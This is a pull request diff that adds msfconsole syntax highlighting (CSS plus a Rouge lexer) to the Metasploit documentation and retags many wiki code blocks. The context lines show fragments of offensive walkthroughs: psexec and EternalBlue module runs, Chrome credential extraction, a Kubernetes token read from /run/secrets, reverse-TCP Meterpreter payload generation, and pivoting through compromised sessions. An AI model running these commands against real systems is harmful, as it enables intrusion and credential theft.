### PR TITLE
Add Metasploit prompt color highlighting to docs

### DIFF
--- a/docs/_includes/header_custom.html
+++ b/docs/_includes/header_custom.html
@@ -6,4 +6,24 @@
 .language-mermaid .label {
     text-transform: inherit;
 }
+
+.language-msf .zp {
+    text-decoration: underline;
+}
+
+.language-msf .ze {
+    color: #960050;
+}
+
+.language-msf .zg {
+    color: #859900;
+}
+
+.language-msf .zs {
+    color: #268bd2;
+}
+
+.language-msf .zw {
+    color: orange;
+}
 </style>

--- a/docs/_plugins/metasploit_console_language.rb
+++ b/docs/_plugins/metasploit_console_language.rb
@@ -1,0 +1,74 @@
+require 'rouge'
+
+# Custom highlighting support for Metasploit's prompt
+# https://rouge-ruby.github.io/docs/file.LexerDevelopment.html
+module Rouge
+  # Custom tokens specific to Msf, as the inbuilt lexer tokens can't capture
+  # the detail required for Msf's print_warning/print_good/etc calls.
+  module Tokens
+    def self.token(name, shortname, &b)
+      tok = Token.make_token(name, shortname, &b)
+      const_set(name, tok)
+    end
+
+    # The 'shortname' is the class used when generating the HTML. It is intentionally
+    # short to reduce HTML size.
+    # https://github.com/rouge-ruby/rouge/blob/a4ed658d2778a3e2d3e68873f7221b91149a2ed4/lib/rouge/token.rb#L69
+    SHORTNAME = 'z'
+
+    token :Msf, SHORTNAME do
+      # prompt - msf / msf5 / msf6 / meterpreter
+      token :Prompt, "#{SHORTNAME}p"
+      # [-]
+      token :Error, "#{SHORTNAME}e"
+      # [+]
+      token :Good, "#{SHORTNAME}g"
+      # [*]
+      token :Status, "#{SHORTNAME}s"
+      # [!]
+      token :Warning, "#{SHORTNAME}w"
+    end
+  end
+
+  module Lexers
+    class MetasploitConsoleLanguage < Rouge::RegexLexer
+      title 'msf'
+      tag 'msf'
+      desc 'Metasploit console highlighter'
+      filenames []
+      mimetypes []
+
+      def self.keywords
+        @keywords ||= Set.new %w()
+      end
+
+      state :whitespace do
+        rule %r/\s+/, Text
+      end
+
+      state :root do
+        mixin :whitespace
+
+        # Match msf, msf5, msf6, meterpreter
+        rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
+        rule %r{^\[-\]}, Tokens::Msf::Error
+        rule %r{^\[\+\]}, Tokens::Msf::Good
+        rule %r{^\[\*\]}, Tokens::Msf::Status
+        rule %r{^\[\!\]}, Tokens::Msf::Warning
+        rule %r{.+}, Text
+      end
+
+      # State for highlighting the prompt such as
+      # msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
+      state :msf_prompt do
+        mixin :whitespace
+
+        rule %r{exploit|payload|auxiliary|encoder|evasion|post|nop}, Text
+        rule %r{\(}, Punctuation
+        rule %r{\)}, Punctuation
+        rule %r{[\w/]+}, Keyword::Constant
+        rule %r{>}, Punctuation, :pop!
+      end
+    end
+  end
+end

--- a/docs/metasploit-framework.wiki/Guidelines-for-Writing-Modules-with-SMB.md
+++ b/docs/metasploit-framework.wiki/Guidelines-for-Writing-Modules-with-SMB.md
@@ -289,7 +289,7 @@ end
 
 msfconsole output:
 
-```
+```msf
 msf6 exploit(windows/smb/msf_smb_client_test) > options
 
 Module options (exploit/windows/smb/msf_smb_client_test):
@@ -406,7 +406,7 @@ end
 
 msfconsole output:
 
-```
+```msf
 msf6 exploit(windows/smb/ruby_smb_client_test) > options
 
 Module options (exploit/windows/smb/ruby_smb_client_test):

--- a/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md
+++ b/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md
@@ -9,7 +9,7 @@ Many modules dump hashes from various software.  Anything from the OS: [Windows]
 ## Hash Identify Example
 
 In this first, simple, example we will simply show loading the library and calling its function.
-```
+```ruby
 require 'metasploit/framework/hashes/identify'
 puts identify_hash "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
 # note, bad hashes return an empty string since nil is not accepted when creating credentials in msf.
@@ -17,7 +17,7 @@ puts identify_hash "This_is a Fake Hash"
 puts identify_hash "_9G..8147mpcfKT8g0U."
 ```
 In practice, we receive the following output from this:
-```
+```ruby
 msf5 > irb
 [*] Starting IRB shell...
 [*] You are in the "framework" object

--- a/docs/metasploit-framework.wiki/How-to-deprecate-a-Metasploit-module.md
+++ b/docs/metasploit-framework.wiki/How-to-deprecate-a-Metasploit-module.md
@@ -35,7 +35,7 @@ DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth'
 
 When the user loads that module, they should see a warning like this:
 
-```
+```msf
 msf > use exploit/windows/misc/test 
 
 [!] ************************************************************************

--- a/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md
+++ b/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md
@@ -2,7 +2,7 @@ This is an update of the original blog post about how to get Oracle support work
 
 Due to licensing issues, we cannot ship Oracle's proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module:
 
-```
+```msf
 msf auxiliary(oracle_login) > run
 
 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -11,7 +11,7 @@ msf auxiliary(oracle_login) > run
 msf auxiliary(oracle_login) > run
 ```
 or
-```
+```msf
 msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 
 [-] Failed to load the OCI library: cannot load such file -- oci8

--- a/docs/metasploit-framework.wiki/How-to-get-started-with-writing-a-post-module.md
+++ b/docs/metasploit-framework.wiki/How-to-get-started-with-writing-a-post-module.md
@@ -32,7 +32,7 @@ So you know how in Lord of the Rings, people are totally obsessed with the One R
 
 You can use the ```session``` method to access the session object, or its alias ```client```. The best way to interact with one is via irb, here's an example of how:
 
-```
+```msf
 msf exploit(handler) > run
 
 [*] Started reverse handler on 192.168.1.64:4444 

--- a/docs/metasploit-framework.wiki/How-to-log-in-Metasploit.md
+++ b/docs/metasploit-framework.wiki/How-to-log-in-Metasploit.md
@@ -15,7 +15,7 @@ msf > irb
 By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this:
 
 
-```
+```msf
 msf > setg LogLevel 3
 LogLevel => 3
 msf >

--- a/docs/metasploit-framework.wiki/How-to-use-a-Metasploit-module-appropriately.md
+++ b/docs/metasploit-framework.wiki/How-to-use-a-Metasploit-module-appropriately.md
@@ -6,7 +6,7 @@ In this documentation, understand that we require you no exploit development kno
 
 Each Metasploit module comes with some metadata that explains what it's about, and to see that you must load it first. An example:
 
-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 ```
 
@@ -24,7 +24,7 @@ This may sound surprising, but sometimes we get asked questions that are already
 
 You can use the info command to see the module's description:
 
-```
+```msf
 msf exploit(ms08_067_netapi) > info
 ```
 
@@ -36,13 +36,13 @@ If the exploit supports automatic targeting, it is always the first item on the 
 
 The "show options" command will tell you which target is selected. For example:
 
-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```
 
 The "show targets" command will give you a list of targets supported:
 
-```
+```msf
 msf exploit(ms08_067_netapi) > show targets
 ```
 
@@ -50,13 +50,13 @@ msf exploit(ms08_067_netapi) > show targets
 
 All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you're testing. To do a quick double-check, usually the "show options" command is enough:
 
-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```
 
 However, "show options" only shows you all the basic options. It does not show you the evasive or advanced options (try "show evasion" and "show advanced"), the command you should use that shows you all the datastore options is actually the "set" command:
 
-```
+```msf
 msf exploit(ms08_067_netapi) > set
 ```
 

--- a/docs/metasploit-framework.wiki/How-to-use-command-stagers.md
+++ b/docs/metasploit-framework.wiki/How-to-use-command-stagers.md
@@ -187,7 +187,7 @@ end
 And let's run that, we should have a shell:
 
 
-```
+```msf
 msf exploit(cmdstager_demo) > run
 
 [*] Started reverse TCP handler on 10.6.0.92:4444 

--- a/docs/metasploit-framework.wiki/How-to-use-datastore-options.md
+++ b/docs/metasploit-framework.wiki/How-to-use-datastore-options.md
@@ -21,7 +21,7 @@ option, which can be set by using the `setg` command. Module-level means only th
 remembers that datastore option, no other components will know about it. You are setting a module-level option if you
 load a module first, and then use the `set` command, like the following:
 
-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 msf exploit(ms08_067_netapi) > set rhost 10.0.1.3
 rhost => 10.0.1.3

--- a/docs/metasploit-framework.wiki/How-to-use-the-Favorite-command.md
+++ b/docs/metasploit-framework.wiki/How-to-use-the-Favorite-command.md
@@ -33,7 +33,7 @@ OPTIONS:
 
 The second method of adding favorites allows adding multiple modules at once:
 
-```shell
+```msf
 msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
 [+] Added exploit/multi/handler to the favorite modules file
 [+] Added exploit/windows/smb/psexec to the favorite modules file
@@ -72,7 +72,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
 
 #### Clearing the favorites list
 
-```shell
+```msf
 msf6 > show favorites
 
 Favorites

--- a/docs/metasploit-framework.wiki/How-to-use-the-Git-mixin-to-write-an-exploit-module.md
+++ b/docs/metasploit-framework.wiki/How-to-use-the-Git-mixin-to-write-an-exploit-module.md
@@ -351,7 +351,7 @@ end
 
 The module will start the http server and print the repo to clone
 
-```
+```msf
 msf6 > use exploit/multi/http/git_clone_test
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(multi/http/git_clone_test) > set srvport 9999

--- a/docs/metasploit-framework.wiki/How-to-write-a-HTTP-LoginScanner-Module.md
+++ b/docs/metasploit-framework.wiki/How-to-write-a-HTTP-LoginScanner-Module.md
@@ -382,7 +382,7 @@ And finally, make sure your module actually works.
 
 Test for a successful login:
 
-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run
 
 [+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword'
@@ -393,7 +393,7 @@ msf auxiliary(symantec_web_gateway_login) >
 
 Test for a failed login:
 
-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run
 
 [-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass'

--- a/docs/metasploit-framework.wiki/How-to-write-a-module-using-HttpServer-and-HttpClient.md
+++ b/docs/metasploit-framework.wiki/How-to-write-a-module-using-HttpServer-and-HttpClient.md
@@ -82,7 +82,7 @@ In case you're wondering why the web server must terminate after a period of tim
 
 The output for the above example should look something like this:
 
-```
+```msf
 msf exploit(test) > run
 [*] Exploit running as background job.
 

--- a/docs/metasploit-framework.wiki/Information-About-Unmet-Browser-Exploit-Requirements.md
+++ b/docs/metasploit-framework.wiki/Information-About-Unmet-Browser-Exploit-Requirements.md
@@ -30,7 +30,7 @@ The exploit should say what requirements are not met. The requirements are expla
 
 If you'd like to check the comparisons, simply set VERBOSE to true. The following is an example:
 
-```
+```msf
 msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true
 VERBOSE => true
 msf exploit(ms13_022_silverlight_script_object) > run

--- a/docs/metasploit-framework.wiki/Loading-Test-Modules.md
+++ b/docs/metasploit-framework.wiki/Loading-Test-Modules.md
@@ -1,6 +1,6 @@
 By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
 
-```
+```msf
 msf6 > loadpath test/modules
 Loaded 38 modules:
     14 auxiliary modules

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-HTTP.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-HTTP.md
@@ -10,7 +10,7 @@ Note that any port can be used to run an application which communicates via HTTP
 
 This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:
 
-```
+```msf
 msf6 > search tomcat http
 ```
 
@@ -48,7 +48,7 @@ run http://example.com HttpTrace=true verbose=true
 
 For instance:
 
-```
+```msf
 msf6 > use scanner/http/title
 msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-Kubernetes.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-Kubernetes.md
@@ -8,7 +8,7 @@ a compromised docker container, or external to the cluster if the required APIs 
 
 In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:
 
-```
+```msf
 msf6 > search kubernetes
 ```
 
@@ -40,7 +40,7 @@ run session=-1
 
 If the Kubernetes API is publicly accessible and you have a JWT Token:
 
-```
+```msf
 msf6 > use cloud/kubernetes/enum_kubernetes
 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
 RHOST => https://kubernetes.docker.internal:6443
@@ -67,7 +67,7 @@ Namespaces
 
 By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:
 
-```
+```msf
 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
 
 Auxiliary actions:
@@ -114,7 +114,7 @@ The `exploit/multi/kubernetes/exec` module will attempt to create a new pod in t
 If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the module values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` module options
 will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:
 
-```
+```msf
 msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
 TARGET => Interactive WebSocket
 msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
@@ -136,7 +136,7 @@ pwd
 
 If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:
 
-```
+```msf
 msf6 > use exploit/multi/kubernetes/exec
 [*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-LDAP.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-LDAP.md
@@ -36,7 +36,7 @@ run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd a
 
 Example output:
 
-```
+```msf
 msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 [*] Running module against 192.168.123.13
 
@@ -100,7 +100,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 
 Query LDAP for accounts:
 
-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-MSSQL.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-MSSQL.md
@@ -41,7 +41,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 
 Connect to a Microsoft SQL Server instance and run a query:
 
-```
+```msf
 msf6 > use auxiliary/admin/mssql/mssql_sql
 msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-MySQL.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-MySQL.md
@@ -13,7 +13,7 @@ Metasploit has support for multiple MySQL modules, including:
 
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
 
-```
+```msf
 msf6 > search mysql
 ```
 

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-Post-Gather-Modules.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-Post-Gather-Modules.md
@@ -6,7 +6,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai
 
 You can search for post gather modules within msfconsole:
 
-```
+```msf
 msf6 > search type:post platform:windows name:gather
 
 Matching Modules
@@ -25,7 +25,7 @@ There are two ways to launch a Post module, both require an existing session.
 
 Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
 
-```
+```msf
 msf6 > use post/windows/gather/enum_chrome
 msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
 
@@ -49,7 +49,7 @@ msf6 post(windows/gather/enum_chrome) >
 
 Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:
 
-```
+```msf
 msf6 > sessions --interact -1
 [*] Starting interaction with 5...
 

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-PostgreSQL.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-PostgreSQL.md
@@ -13,7 +13,7 @@ Metasploit has support for multiple PostgreSQL modules, including:
 
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
 
-```
+```msf
 msf6 > search postgres
 ```
 
@@ -97,7 +97,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432
 
 Metasploit's output will be:
 
-```
+```msf
 msf6 auxiliary(server/capture/postgresql) >
 [*] Started service listener on 0.0.0.0:5432
 [*] Server started.

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-SMB.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-SMB.md
@@ -23,7 +23,7 @@ Metasploit has support for multiple SMB modules, including:
 
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
 
-```
+```msf
 msf6 > search mysql
 ```
 
@@ -192,7 +192,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 
 Running psexec against a host:
 
-```
+```msf
 msf6 > use exploit/windows/smb/psexec
 msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
 

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-SSH.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-SSH.md
@@ -11,7 +11,7 @@ Metasploit has support for multiple SSH modules, including:
 
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
 
-```
+```msf
 msf6 > search ssh
 ```
 
@@ -60,7 +60,7 @@ docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest
 
 It should now be possible to test the SSH login from msfconsole:
 
-```
+```msf
 msf6 > use scanner/ssh/ssh_login
 msf6 auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222
 

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-Setting-Module-Options.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-Setting-Module-Options.md
@@ -2,7 +2,7 @@
 
 Each Metasploit module has a set of options which must be set before running. These can be seen with the `show options` or `options` command:
 
-```
+```msf
 msf6 exploit(windows/smb/ms17_010_eternalblue) > options
 
 Module options (exploit/windows/smb/ms17_010_eternalblue):
@@ -35,7 +35,7 @@ Exploit target:
 
 Each Metasploit module also has _advanced_ options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful:
 
-```
+```msf
 msf6 exploit(windows/smb/ms17_010_eternalblue) > advanced
 
 Module advanced options (exploit/windows/smb/ms17_010_eternalblue):
@@ -60,7 +60,7 @@ Payload advanced options (windows/x64/meterpreter/reverse_tcp):
 
 You can see which options stilloptions to be set with the `show missing` command:
 
-```
+```msf
 msf6 exploit(windows/smb/ms17_010_eternalblue) > show missing
 
 Module options (exploit/windows/smb/ms17_010_eternalblue):

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-WinRM.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-WinRM.md
@@ -40,7 +40,7 @@ Metasploit has support for multiple WinRM modules, including:
 
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
 
-```
+```msf
 msf6 > search winrm
 ```
 
@@ -69,7 +69,7 @@ run https://192.168.123.139:5986
 
 Example:
 
-```
+```msf
 msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985
 
 [+] 192.168.123.139:5985: Negotiate protocol supported
@@ -122,7 +122,7 @@ run http://user:pass@192.168.123.139:5985
 
 Example:
 
-```
+```msf
 msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985
 
 [!] No active DB -- Credential data will not be saved!
@@ -145,7 +145,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 
 Open a WinRM session:
 
-```
+```msf
 msf6 > use auxiliary/scanner/winrm/winrm_login
 msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd win::rmauth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
 

--- a/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md
+++ b/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md
@@ -60,7 +60,7 @@ When the user views the options for a given module, it will be consolidated. The
 
 Multiple options are available for configuring the module options:
 
-```
+```msf
 msf5 exploit(multi/http/tomcat_mgr_upload) > options
 
 Module options (exploit/multi/http/tomcat_mgr_upload):
@@ -87,7 +87,7 @@ Exploit target:
 
  Multiple options are consolidated into a single TARGETS field:
 
-```
+```msf
 msf5 exploit(multi/http/tomcat_mgr_upload) > options
 
 Module options (exploit/multi/http/tomcat_mgr_upload):

--- a/docs/metasploit-framework.wiki/Meterpreter-Debugging-Meterpreter-Sessions.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Debugging-Meterpreter-Sessions.md
@@ -7,7 +7,7 @@ There are currently two main ways to debug Meterpreter sessions:
 
 This can be enabled for any Meterpreter session, and does not require a debug Metasploit build:
 
-```
+```msf
 msf6 > setg SessionTlvLogging true
 SessionTlvLogging => true
 ```

--- a/docs/metasploit-framework.wiki/Meterpreter-Reg-Command.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Reg-Command.md
@@ -61,7 +61,7 @@ meterpreter > reg enumkey -k HKCU\\Keyboard Layout
 The result of your registry queries can be impacted if you are interacting with a x86 or x64 Windows session.
 You can see the type of session you currently have open with the `sessions` command:
 
-```
+```msf
 msf6 exploit(windows/smb/psexec) > sessions
 
 Active sessions

--- a/docs/metasploit-framework.wiki/Module-Documentation.md
+++ b/docs/metasploit-framework.wiki/Module-Documentation.md
@@ -11,7 +11,7 @@ The help page includes:
 ### How to use it
 After you load a module, you can type ```info -d``` to generate a help page that provides basic usage information and displays the PR history for the module. 
 
-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info -d
 ```

--- a/docs/metasploit-framework.wiki/Payload-UUID.md
+++ b/docs/metasploit-framework.wiki/Payload-UUID.md
@@ -44,7 +44,7 @@ $ cat ~/.msf4/payloads.json
 ```
 
 Once this payload is launched, the output of the ```sessions -l -v``` command will show the UUID, whether or not the UUID is registered, and any locally-assigned name of the UUID:
-```
+```msf
 msf exploit(handler) > run -j
 [*] 127.0.0.1:36235 (UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z) Staging Native payload ...
 [*] Meterpreter session 1 opened (127.1.1.1:4444 -> 127.0.0.1:36235) at 2015-06-25 17:12:40 -0700

--- a/docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md
+++ b/docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md
@@ -33,7 +33,7 @@ There a few ways to register this route in Metasploit so that it knows how to re
 ## AutoRoute
 One of the easiest ways to do this is to use the `post/multi/manage/autoroute` module which will help us automatically add in routes for the target to Metasploit's routing table so that Metasploit knows how to route traffic through the session that we have on the Windows 11 box and to the target Windows Server 2019 box. Lets look at a sample run of this command:
 
-```
+```msf
 meterpreter > background
 [*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use post/multi/manage/autoroute
@@ -80,7 +80,7 @@ msf6 post(multi/manage/autoroute) >
 ```
 If we now use Meterpreter's `route` command we can see that we have two route table entries within Metasploit's routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets.
 
-```
+```msf
 msf6 post(multi/manage/autoroute) > route
 
 IPv4 Active Routing Table
@@ -97,7 +97,7 @@ msf6 post(multi/manage/autoroute) >
 
 All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
 
-```
+```msf
 msf6 post(multi/manage/autoroute) > route flush
 msf6 post(multi/manage/autoroute) > route
 [*] There are currently no routes defined.
@@ -108,7 +108,7 @@ Now lets trying doing the same thing manually.
 ## Route
 Here we can use `route add <IP ADDRESS OF SUBNET> <NETMASK> <GATEWAY>` to add the routes from within Metasploit, followed by `route print` to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through.
 
-```
+```msf
 msf6 post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
 [*] Route added
 msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
@@ -131,7 +131,7 @@ msf6 post(multi/manage/autoroute) >
 
 Finally we can check that the route will use session 1 by using `route get 169.254.204.110`
 
-```
+```msf
 msf6 post(multi/manage/autoroute) > route get 169.254.204.110
 169.254.204.110 routes through: Session 1
 msf6 post(multi/manage/autoroute) >
@@ -141,7 +141,7 @@ If we want to then remove a specific route (such as in this case we want to remo
 
 Example:
 
-```
+```msf
 msf6 post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
 [*] Route removed
 msf6 post(multi/manage/autoroute) > route
@@ -160,7 +160,7 @@ msf6 post(multi/manage/autoroute) >
 ## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:
 
-```
+```msf
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
 
 Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
@@ -221,7 +221,7 @@ The Windows Meterpreter payload supports lateral movement in a network through S
 
 First open a Windows Meterpreter session to the pivot machine:
 
-```
+```msf
 msf6 > use payload/windows/x64/meterpreter/reverse_tcp
 smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
 lhost => 172.19.182.171
@@ -237,7 +237,7 @@ msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 by
 
 Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
 
-```
+```msf
 msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
 [*] Starting interaction with 1...
 
@@ -249,7 +249,7 @@ meterpreter > background
 
 Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.
 
-```
+```msf
 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
 
 Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
@@ -267,7 +267,7 @@ msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o re
 ```
 
 After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
-```
+```msf
 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
 
 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
@@ -383,7 +383,7 @@ Once routes are established, Metasploit modules can access the IP range specifie
 ### Socks Server Module Setup
 Metasploit can launch a SOCKS proxy server using the module: `auxiliary/server/socks_proxy`. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit's routing tables. Here is an example of how this module might be used:
 
-```
+```msf
 msf6 > use auxiliary/server/socks_proxy
 msf6 auxiliary(server/socks_proxy) > show options
 

--- a/docs/metasploit-framework.wiki/Python-Extension.md
+++ b/docs/metasploit-framework.wiki/Python-Extension.md
@@ -291,7 +291,7 @@ Payload size: 6412437 bytes
 Saved as: /tmp/met-stageless.exe
 ```
 When this payload is executed, the transport is added and shown to be present in the transport list immediately:
-```
+```msf
 msf exploit(handler) > [*] Meterpreter session 2 opened (172.16.52.1:4445 -> 172.16.52.247:49159) at 2015-12-13 11:06:54 +1000
 
 msf exploit(handler) > sessions -i -1

--- a/docs/metasploit-framework.wiki/Running-Private-Modules.md
+++ b/docs/metasploit-framework.wiki/Running-Private-Modules.md
@@ -48,7 +48,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis
 
 Then, in my msfconsole window:
 
-```
+```msf
 msf > reload_all
 [*] Reloading modules from all module paths...
 IIIIII    dTb.dTb        _.---._

--- a/docs/metasploit-framework.wiki/Writing-Module-Documentation.md
+++ b/docs/metasploit-framework.wiki/Writing-Module-Documentation.md
@@ -22,7 +22,7 @@ If you go to metasploit-framework/documentation/modules, you'll see that there a
 
 For example:
 
-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info
 

--- a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
+++ b/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
@@ -154,7 +154,7 @@ To run the module, specify the login credentials for an AD user, and set `RHOSTS
 This will cause the module to log into the LDAP server on the target DC, and list out the vulnerable certificate templates and which CA servers they are available from,
 as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server:
 
-```
+```msf
 msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
 
